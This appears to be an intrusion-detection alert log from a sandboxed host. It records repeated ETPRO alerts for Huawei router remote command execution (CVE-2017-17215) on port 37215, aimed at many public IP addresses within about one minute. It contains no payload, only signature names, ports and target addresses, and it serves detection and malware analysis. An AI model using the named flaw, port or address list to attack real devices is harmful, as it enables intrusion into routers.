                                                        06/13/24-21:32:13.567381TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3739037215192.168.2.1441.238.234.105
                                                        06/13/24-21:32:09.440980TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5936037215192.168.2.14156.35.159.249
                                                        06/13/24-21:33:13.231246TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3536437215192.168.2.1441.235.79.102
                                                        06/13/24-21:32:36.264994TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5105037215192.168.2.14197.191.54.202
                                                        06/13/24-21:33:02.908717TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5353437215192.168.2.1441.115.226.160
                                                        06/13/24-21:32:38.300113TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5787837215192.168.2.1441.50.52.125
                                                        06/13/24-21:32:56.789903TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4459037215192.168.2.14197.37.223.10
                                                        06/13/24-21:33:00.871060TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5091637215192.168.2.14197.246.55.16
                                                        06/13/24-21:32:34.191880TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5408837215192.168.2.1441.130.237.25
                                                        06/13/24-21:32:44.453327TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3904637215192.168.2.14156.106.222.5
                                                        06/13/24-21:31:59.196394TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3309037215192.168.2.1441.2.55.158
                                                        06/13/24-21:33:07.039213TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5523437215192.168.2.14197.26.36.99
                                                        06/13/24-21:33:17.308757TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3950637215192.168.2.14156.234.190.149
                                                        06/13/24-21:31:59.177011TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5544437215192.168.2.14156.83.50.249
                                                        06/13/24-21:32:07.401355TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5617437215192.168.2.1441.98.114.69
                                                        06/13/24-21:32:15.636050TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5434237215192.168.2.14197.249.140.237
                                                        06/13/24-21:32:42.408428TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5688837215192.168.2.1441.86.65.221
                                                        06/13/24-21:32:15.630939TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3878037215192.168.2.14156.46.230.201
                                                        06/13/24-21:32:11.509242TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3421637215192.168.2.1441.232.70.156
                                                        06/13/24-21:32:17.696858TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4978837215192.168.2.14197.188.215.92
                                                        06/13/24-21:32:32.165118TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5675637215192.168.2.1441.16.222.232
                                                        06/13/24-21:33:02.937863TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4715637215192.168.2.14197.232.59.192
                                                        06/13/24-21:33:07.041681TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5640637215192.168.2.14197.204.80.95
                                                        06/13/24-21:33:11.158781TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3874237215192.168.2.14197.169.118.79
                                                        06/13/24-21:32:30.077335TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3294437215192.168.2.14197.233.123.47
                                                        06/13/24-21:33:05.013868TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4581037215192.168.2.14156.9.4.103
                                                        06/13/24-21:33:09.129604TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4388037215192.168.2.14156.91.138.106
                                                        06/13/24-21:33:00.869977TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3552037215192.168.2.14197.92.255.184
                                                        06/13/24-21:32:30.094415TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3777237215192.168.2.1441.153.228.23
                                                        06/13/24-21:32:52.660199TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3912237215192.168.2.14156.47.33.249
                                                        06/13/24-21:32:03.306317TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3284837215192.168.2.14197.153.164.88
                                                        06/13/24-21:32:09.458347TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4170237215192.168.2.14197.97.70.142
                                                        06/13/24-21:32:38.317192TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4378437215192.168.2.1441.176.138.68
                                                        06/13/24-21:32:15.610276TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4567637215192.168.2.14156.121.30.98
                                                        06/13/24-21:32:30.094636TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6034037215192.168.2.14156.73.227.132
                                                        06/13/24-21:32:32.169892TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6019237215192.168.2.1441.47.95.102
                                                        06/13/24-21:32:01.241147TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5785437215192.168.2.1441.204.218.121
                                                        06/13/24-21:32:36.263640TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3689037215192.168.2.14197.162.162.4
                                                        06/13/24-21:33:07.055478TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4572437215192.168.2.1441.198.111.6
                                                        06/13/24-21:33:11.155026TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4683837215192.168.2.14156.236.122.96
                                                        06/13/24-21:32:01.238071TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5759837215192.168.2.1441.240.242.23
                                                        06/13/24-21:32:01.241102TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4880837215192.168.2.14156.207.230.38
                                                        06/13/24-21:32:52.670384TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4866237215192.168.2.1441.60.220.2
                                                        06/13/24-21:32:48.555987TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4900837215192.168.2.14156.171.15.20
                                                        06/13/24-21:32:32.170917TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4052837215192.168.2.1441.227.77.208
                                                        06/13/24-21:32:48.552860TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3338437215192.168.2.14197.235.242.152
                                                        06/13/24-21:32:19.731013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4510837215192.168.2.14156.129.214.114
                                                        06/13/24-21:32:28.045630TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5915237215192.168.2.1441.213.242.218
                                                        06/13/24-21:32:13.544161TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5631037215192.168.2.14156.54.199.138
                                                        06/13/24-21:32:25.996307TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4694237215192.168.2.14156.70.3.38
                                                        06/13/24-21:32:34.192573TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5194837215192.168.2.14197.68.215.223
                                                        06/13/24-21:32:38.301183TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4654837215192.168.2.1441.194.249.37
                                                        06/13/24-21:32:28.028723TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3835437215192.168.2.14197.139.207.242
                                                        06/13/24-21:32:17.672148TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4803037215192.168.2.14156.154.51.252
                                                        06/13/24-21:32:30.123001TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3598237215192.168.2.1441.226.58.222
                                                        06/13/24-21:33:04.993055TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4630437215192.168.2.1441.63.37.187
                                                        06/13/24-21:33:04.991035TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5684637215192.168.2.14156.7.19.237
                                                        06/13/24-21:32:13.544440TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3856037215192.168.2.14197.65.168.235
                                                        06/13/24-21:32:52.679512TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3366037215192.168.2.14197.97.144.110
                                                        06/13/24-21:32:25.973376TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5935837215192.168.2.14197.69.121.252
                                                        06/13/24-21:32:38.301921TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3593437215192.168.2.1441.7.77.143
                                                        06/13/24-21:32:34.194041TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3572437215192.168.2.14197.150.34.50
                                                        06/13/24-21:33:17.308625TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4758437215192.168.2.1441.93.121.217
                                                        06/13/24-21:32:42.404518TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5238037215192.168.2.14197.24.53.184
                                                        06/13/24-21:33:07.055931TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4627037215192.168.2.1441.220.134.156
                                                        06/13/24-21:31:59.197735TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5442637215192.168.2.14156.207.60.191
                                                        06/13/24-21:32:42.420171TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4100237215192.168.2.14197.24.142.3
                                                        06/13/24-21:31:57.137957TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4506837215192.168.2.14197.14.31.12
                                                        06/13/24-21:32:52.658905TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5856837215192.168.2.14156.102.184.248
                                                        06/13/24-21:33:09.089343TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4044637215192.168.2.14156.50.126.193
                                                        06/13/24-21:33:11.178736TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4439037215192.168.2.14156.118.73.74
                                                        06/13/24-21:32:03.298582TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5238837215192.168.2.14197.181.128.207
                                                        06/13/24-21:32:48.554925TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4138637215192.168.2.1441.33.54.30
                                                        06/13/24-21:32:17.670838TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5291637215192.168.2.1441.55.147.76
                                                        06/13/24-21:32:44.452730TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6073237215192.168.2.14156.255.23.119
                                                        06/13/24-21:32:46.528092TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3515437215192.168.2.14197.202.8.230
                                                        06/13/24-21:32:07.416270TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4068437215192.168.2.14156.154.54.116
                                                        06/13/24-21:32:38.315740TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4343637215192.168.2.1441.128.138.148
                                                        06/13/24-21:32:25.992367TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4770437215192.168.2.14156.33.231.251
                                                        06/13/24-21:32:36.246891TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4115437215192.168.2.14197.197.57.73
                                                        06/13/24-21:32:56.754295TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4973837215192.168.2.14156.211.138.198
                                                        06/13/24-21:32:52.655462TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5966437215192.168.2.14156.180.129.111
                                                        06/13/24-21:33:17.307637TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4236037215192.168.2.14156.45.58.61
                                                        06/13/24-21:32:36.244950TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5886437215192.168.2.14156.184.221.25
                                                        06/13/24-21:32:34.217060TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3368637215192.168.2.14197.244.189.232
                                                        06/13/24-21:32:13.546429TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3549037215192.168.2.14197.174.206.135
                                                        06/13/24-21:32:30.101174TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4445637215192.168.2.1441.68.17.158
                                                        06/13/24-21:33:17.308582TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3707437215192.168.2.1441.35.132.169
                                                        06/13/24-21:32:19.730901TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3969037215192.168.2.1441.119.77.8
                                                        06/13/24-21:32:30.097753TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4849837215192.168.2.1441.17.98.110
                                                        06/13/24-21:32:03.277506TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4091637215192.168.2.14156.38.59.86
                                                        06/13/24-21:32:23.934408TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3318637215192.168.2.14156.147.143.140
                                                        06/13/24-21:33:00.889556TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4141637215192.168.2.14197.244.39.114
                                                        06/13/24-21:33:04.988032TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5837237215192.168.2.1441.13.19.96
                                                        06/13/24-21:32:19.754241TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3999037215192.168.2.1441.199.199.122
                                                        06/13/24-21:32:42.419686TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6059437215192.168.2.14197.125.215.120
                                                        06/13/24-21:32:32.170531TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3978637215192.168.2.14156.209.138.11
                                                        06/13/24-21:32:58.822457TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6007437215192.168.2.14156.85.138.213
                                                        06/13/24-21:33:00.871918TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6052437215192.168.2.14156.136.244.245
                                                        06/13/24-21:32:48.552061TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4235837215192.168.2.1441.200.178.16
                                                        06/13/24-21:32:01.238528TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3887237215192.168.2.14156.11.233.227
                                                        06/13/24-21:32:21.779999TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4921037215192.168.2.14156.23.168.32
                                                        06/13/24-21:32:48.552896TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5332237215192.168.2.14197.171.148.151
                                                        06/13/24-21:33:15.273734TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5564437215192.168.2.14197.27.251.47
                                                        06/13/24-21:32:36.262891TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5225437215192.168.2.14197.161.117.196
                                                        06/13/24-21:32:38.302128TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4367637215192.168.2.14156.114.35.153
                                                        06/13/24-21:32:34.214119TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3677237215192.168.2.14197.222.198.15
                                                        06/13/24-21:32:52.671110TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6032637215192.168.2.1441.235.73.84
                                                        06/13/24-21:33:02.936468TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3734437215192.168.2.14156.123.250.207
                                                        06/13/24-21:32:52.657798TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3624637215192.168.2.14156.70.131.78
                                                        06/13/24-21:31:59.174375TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5370237215192.168.2.14197.39.96.114
                                                        06/13/24-21:32:25.993663TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4394837215192.168.2.1441.138.139.9
                                                        06/13/24-21:32:21.805664TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4025037215192.168.2.1441.57.163.69
                                                        06/13/24-21:32:46.528436TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3616437215192.168.2.1441.185.20.205
                                                        06/13/24-21:32:54.708504TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5505837215192.168.2.14197.235.60.108
                                                        06/13/24-21:31:57.133961TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4449437215192.168.2.14156.251.163.1
                                                        06/13/24-21:32:15.633738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3481837215192.168.2.14156.167.46.178
                                                        06/13/24-21:31:57.094065TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5705637215192.168.2.14197.213.201.186
                                                        06/13/24-21:32:56.754397TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4457437215192.168.2.14197.116.229.195
                                                        06/13/24-21:32:42.423016TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4116237215192.168.2.14197.162.208.22
                                                        06/13/24-21:33:11.180721TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5460837215192.168.2.14156.233.84.254
                                                        06/13/24-21:32:03.308113TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4193237215192.168.2.14156.40.14.206
                                                        06/13/24-21:32:01.237890TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4090637215192.168.2.1441.152.186.219
                                                        06/13/24-21:31:59.174543TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6008037215192.168.2.14197.49.72.102
                                                        06/13/24-21:32:01.246059TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5973037215192.168.2.14197.72.125.67
                                                        06/13/24-21:32:42.404007TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5882637215192.168.2.1441.69.79.9
                                                        06/13/24-21:32:11.487423TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3687837215192.168.2.14156.188.102.119
                                                        06/13/24-21:33:07.043055TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5838037215192.168.2.14156.247.221.193
                                                        06/13/24-21:32:46.509095TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4544837215192.168.2.14197.149.21.212
                                                        06/13/24-21:32:38.302186TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5788437215192.168.2.14197.109.196.128
                                                        06/13/24-21:32:19.727929TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3837837215192.168.2.14156.221.184.233
                                                        06/13/24-21:32:05.346106TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3854237215192.168.2.1441.42.231.112
                                                        06/13/24-21:32:56.758975TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4539037215192.168.2.14197.50.142.219
                                                        06/13/24-21:33:11.156647TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5829837215192.168.2.14197.126.116.171
                                                        06/13/24-21:32:23.938448TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6027237215192.168.2.14197.131.52.210
                                                        06/13/24-21:32:19.730222TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4439437215192.168.2.14156.13.200.195
                                                        06/13/24-21:32:19.751226TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3806837215192.168.2.1441.249.230.43
                                                        06/13/24-21:32:25.994208TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4361837215192.168.2.14156.115.158.227
                                                        06/13/24-21:32:58.824477TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3819237215192.168.2.14197.216.64.60
                                                        06/13/24-21:31:59.176094TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4223437215192.168.2.14156.163.40.29
                                                        06/13/24-21:32:38.322047TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3600637215192.168.2.14156.40.201.205
                                                        06/13/24-21:32:44.454694TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5949837215192.168.2.14197.66.58.131
                                                        06/13/24-21:32:58.822382TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3439237215192.168.2.1441.93.203.3
                                                        06/13/24-21:33:07.037964TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5882437215192.168.2.14197.120.130.109
                                                        06/13/24-21:32:36.243637TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4228437215192.168.2.14156.96.6.46
                                                        06/13/24-21:32:30.091741TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4055837215192.168.2.14156.241.49.0
                                                        06/13/24-21:31:59.173592TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5805637215192.168.2.1441.135.131.164
                                                        06/13/24-21:32:54.726968TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5643837215192.168.2.1441.111.23.165
                                                        06/13/24-21:31:59.177608TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5558837215192.168.2.14156.237.117.182
                                                        06/13/24-21:33:07.040751TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4771437215192.168.2.1441.159.56.201
                                                        06/13/24-21:32:15.630121TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3719237215192.168.2.14197.108.170.112
                                                        06/13/24-21:32:50.631232TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5886637215192.168.2.14197.31.183.135
                                                        06/13/24-21:33:13.211030TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6017637215192.168.2.14197.225.248.225
                                                        06/13/24-21:32:40.359532TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4968637215192.168.2.1441.98.131.23
                                                        06/13/24-21:32:19.749872TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4694837215192.168.2.14156.53.147.211
                                                        06/13/24-21:32:11.485915TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4933237215192.168.2.14197.206.197.196
                                                        06/13/24-21:32:03.310005TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4799237215192.168.2.14156.7.10.202
                                                        06/13/24-21:32:30.098720TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4692437215192.168.2.14197.53.2.250
                                                        06/13/24-21:33:11.159177TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5130237215192.168.2.14156.18.209.103
                                                        06/13/24-21:32:01.223328TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5189037215192.168.2.1441.126.31.120
                                                        06/13/24-21:33:00.886714TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4985837215192.168.2.1441.12.80.217
                                                        06/13/24-21:33:13.231598TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5194237215192.168.2.14197.93.143.149
                                                        06/13/24-21:33:15.259508TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3896437215192.168.2.1441.170.38.33
                                                        06/13/24-21:32:38.300909TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4003037215192.168.2.14197.51.31.56
                                                        06/13/24-21:32:03.306890TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4338037215192.168.2.14197.239.46.197
                                                        06/13/24-21:32:25.970410TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5222237215192.168.2.14156.184.20.185
                                                        06/13/24-21:32:52.660885TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4727637215192.168.2.1441.98.228.141
                                                        06/13/24-21:33:02.952479TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4570037215192.168.2.1441.109.62.122
                                                        06/13/24-21:32:48.568792TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4659037215192.168.2.14156.215.130.239
                                                        06/13/24-21:32:05.377143TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4414637215192.168.2.1441.170.45.218
                                                        06/13/24-21:32:32.155725TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5681637215192.168.2.1441.60.93.191
                                                        06/13/24-21:32:38.320111TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3293037215192.168.2.14156.241.228.36
                                                        06/13/24-21:32:07.420082TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3401037215192.168.2.14197.203.84.251
                                                        06/13/24-21:33:13.214258TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4410437215192.168.2.1441.39.95.180
                                                        06/13/24-21:33:07.054967TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3748637215192.168.2.1441.201.233.135
                                                        06/13/24-21:32:17.694854TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3837237215192.168.2.14197.106.7.67
                                                        06/13/24-21:32:19.749550TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3628037215192.168.2.14197.68.23.94
                                                        06/13/24-21:32:38.318158TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3930637215192.168.2.14156.157.25.220
                                                        06/13/24-21:33:09.085844TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3579037215192.168.2.14156.24.200.224
                                                        06/13/24-21:33:09.086787TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4137637215192.168.2.1441.35.10.99
                                                        06/13/24-21:33:17.338057TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5622037215192.168.2.1441.116.105.23
                                                        06/13/24-21:32:17.697324TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4121637215192.168.2.1441.93.115.224
                                                        06/13/24-21:32:44.454821TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5568037215192.168.2.1441.148.218.93
                                                        06/13/24-21:32:52.657997TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5149437215192.168.2.1441.43.208.6
                                                        06/13/24-21:32:03.308849TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4222237215192.168.2.1441.21.115.126
                                                        06/13/24-21:32:40.372549TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5851837215192.168.2.14197.229.68.228
